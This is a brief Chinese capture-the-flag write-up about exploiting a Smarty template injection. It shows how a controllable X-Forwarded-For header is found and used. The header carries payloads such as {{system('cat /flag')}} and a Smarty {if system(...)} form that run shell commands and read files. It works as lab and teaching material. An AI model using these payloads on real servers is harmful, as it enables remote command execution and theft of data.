0x00 知识点
- tplmap探测是否存在模板注入漏洞
- smartly模板注入
0x01 知识点详解
解题思路
-
打开网站一看
就看到了他提示的flag,那还不点开看看
提示到了我的IP,这一瞬间就让我想到了http的请求头里的XXF参数和Client-ip参数,想了解http请求头详情的请去看我的上一篇文章 -
接下来用burp抓了一下包尝试改了一下XFF发现这个ip确实是可控的,接下来就有点没什么思路了,后来在大佬的提示下知道了这个是ssti模板注入漏洞。那就构造payload尝试一下
X-Forwarded-for:127.0.0.1{{system('ls')}}
可以直接看到回显。接下里继续构造payload尝试得到flag
X-Forwarded-for:127.0.0.1{{system('cat /flag')}}
后来用tplmap扫过才知道这个是smartly模板注入,正常的payload应该是
{if system('cat ../../../flag')}{/if}
不过好像影响不大。